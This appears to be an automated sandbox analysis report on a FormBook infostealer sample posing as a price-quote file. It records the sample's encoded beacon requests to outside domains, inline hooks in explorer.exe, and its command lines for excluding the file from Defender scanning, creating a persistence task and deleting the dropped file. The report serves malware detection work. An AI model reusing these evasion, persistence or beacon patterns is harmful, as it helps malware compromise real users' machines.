Oct 18, 2023 08:36:51.901827097 CEST	121	OUT	GET /ifrg/?MZTt=ah9Zs86GdfepTqxOruRY6KJXUwZDi9MhDmG697S0SgB6n7piKWqUPBRkmR/995/dCXxf&jlUpT=PtkH4NF HTTP/1.1 Host: www.boat-insurance-today.world Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:36:52.057290077 CEST	121	IN	HTTP/1.1 409 Conflict Date: Wed, 18 Oct 2023 06:36:51 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 817ec4f8c9100ad3-LAS Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.9	49725	108.179.194.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:37:11.727615118 CEST	156	OUT	GET /ifrg/?MZTt=8SE7XcMvB9HzvYlCBNVH12K36pI2tFzG7ev9rhkff3WzzhkSbyOCO1+x97lbxB99FFNL&jlUpT=PtkH4NF HTTP/1.1 Host: www.transporteturisticofradan.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:37:11.930295944 CEST	156	IN	HTTP/1.1 401 Unauthorized Date: Wed, 18 Oct 2023 06:37:11 GMT Server: Apache WWW-Authenticate: Basic realm="Access Restricted (pwrestrict)" Content-Length: 14 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 41 63 63 65 73 73 20 44 65 6e 69 65 64 21 Data Ascii: Access Denied!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.9	49726	154.12.93.8	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:37:33.100857973 CEST	157	OUT	GET /ifrg/?MZTt=5jR7lvWWhXckZO8bi4azApxiCxIqQi0sZy8hVgUcz7H/XBNAH/0FPTwnmComPhSN5IMV&jlUpT=PtkH4NF HTTP/1.1 Host: www.gdminsheng.icu Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:37:33.263673067 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Oct 2023 06:37:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.9	49727	3.33.130.190	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:37:53.415165901 CEST	158	OUT	GET /ifrg/?MZTt=Jgjy4Hq2fjmR90eBASSIXnz/xCLuGnPv2f5bI+kqzTyohR3vwUCAwejwU7RKcNO0BN0L&jlUpT=PtkH4NF HTTP/1.1 Host: www.dewdrop.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:37:53.641710043 CEST	159	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 18 Oct 2023 06:37:53 GMT Content-Type: text/html Content-Length: 291 Connection: close ETag: "65271109-123" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.9	49728	212.129.41.217	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:38:14.037700891 CEST	160	OUT	GET /ifrg/?MZTt=D0BUyIgnkwa8kGN9Qj6aSRghucWXbLaIManVicGkKBrvZQsQ3EBcb5KKQY7GQNLPjnt4&jlUpT=PtkH4NF HTTP/1.1 Host: www.vespeciative.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:38:14.542393923 CEST	161	IN	HTTP/1.0 404 Not Found Date: Wed, 18 Oct 2023 06:38:14 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 X-Powered-By: PHP/7.4.33 Content-Length: 1840 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 2e 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 35 70 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 6f 74 66 6f 75 6e 64 20 2e 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 35 70 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 6f 74 66 6f 75 6e 64 20 2e 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .notfound-404 h1 { font-size: 186px;
Oct 18, 2023 08:38:14.542434931 CEST	162	IN	Data Raw: 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 Data Ascii: font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; margin: 0 } .notfound p {

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEB

Target ID:	1
Start time:	08:34:18
Start date:	18/10/2023
Path:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Imagebase:	0x8c0000
File size:	618'496 bytes
MD5 hash:	94C19A35210D356074C3CFAA1EA92350
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:34:23
Start date:	18/10/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Imagebase:	0x670000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:34:23
Start date:	18/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:34:23
Start date:	18/10/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp
Imagebase:	0x9f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:34:23
Start date:	18/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:34:24
Start date:	18/10/2023
Path:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Imagebase:	0xf20000
File size:	618'496 bytes
MD5 hash:	94C19A35210D356074C3CFAA1EA92350
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:34:25
Start date:	18/10/2023
Path:	C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Imagebase:	0xa20000
File size:	618'496 bytes
MD5 hash:	94C19A35210D356074C3CFAA1EA92350
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:34:29
Start date:	18/10/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmp17EA.tmp
Imagebase:	0x9f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:34:29
Start date:	18/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:34:29
Start date:	18/10/2023
Path:	C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Imagebase:	0xe00000
File size:	618'496 bytes
MD5 hash:	94C19A35210D356074C3CFAA1EA92350
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:34:30
Start date:	18/10/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff633410000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	08:34:32
Start date:	18/10/2023
Path:	C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmstp.exe
Imagebase:	0xa10000
File size:	81'920 bytes
MD5 hash:	D7AABFAB5BEFD53BA3A27BD48F3CC675
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	08:34:35
Start date:	18/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:34:35
Start date:	18/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	2

Executed Functions

Function 072E7968 Relevance: 3.5, Strings: 2, Instructions: 1042
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1a[9, xrefs: 072E7D6A
3X2, xrefs: 072E7D74

Memory Dump Source

Source File: 00000001.00000002.1500199900.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID: 1a[9$3X2
API String ID: 0-3189659699
Opcode ID: 37d776f9abf70485357a22feb45c9fe2077520106d51575f7ea26b5cc5fd523b
Instruction ID: 5e2dc5844b56b5f24947a726464ccc100100e06c376c4d34ef22360f88302797
Opcode Fuzzy Hash: 37d776f9abf70485357a22feb45c9fe2077520106d51575f7ea26b5cc5fd523b
Instruction Fuzzy Hash: 40B2C075A10628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 072EB8F8 Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1500199900.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce145efa095cdbcd1ab74cbf33b1de434a9d658f065dde8871ba6e7faa04451e
Instruction ID: a9abf37e872d65063e912327a1c4824cd39397b721fbd25ee463ff166ea3b069
Opcode Fuzzy Hash: ce145efa095cdbcd1ab74cbf33b1de434a9d658f065dde8871ba6e7faa04451e
Instruction Fuzzy Hash: 6651C4B4E152199FCB04DFAAD580AAEFBF6FF89310F24C126D419A7315DB309942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072EB6F0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1500199900.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac50949c0d0c2711ec984ec1856eb672059f51e40f82832a67ada64362ebcaf
Instruction ID: 29b77a597b07127917f2584c26f9cf016acc1476ecdc3e138b8301cc0a94f195
Opcode Fuzzy Hash: 9ac50949c0d0c2711ec984ec1856eb672059f51e40f82832a67ada64362ebcaf
Instruction Fuzzy Hash: 3A51A2B5D112199FDF08DFEAC844AEEFBB6BF89300F10802AD419AB254DB745946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0B840FD8 Relevance: 1.5, APIs: 1, Instructions: 48
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0B84103D

Memory Dump Source

Source File: 00000001.00000002.1500896761.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b840000_IMG.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6ef4e103631002824a81372ccd4d813be00c147751190851d64fa37680b908c2
Instruction ID: e47303ca0325d422187b3307a4ac9f6ad958115d7fedb1425895d8aaa33e41d5
Opcode Fuzzy Hash: 6ef4e103631002824a81372ccd4d813be00c147751190851d64fa37680b908c2
Instruction Fuzzy Hash: EC11E0B58006489FDB10DF9AD889BDEBFF8EB48320F10845AE558A7650D375A584CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0B84006C Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0B84103D

Memory Dump Source

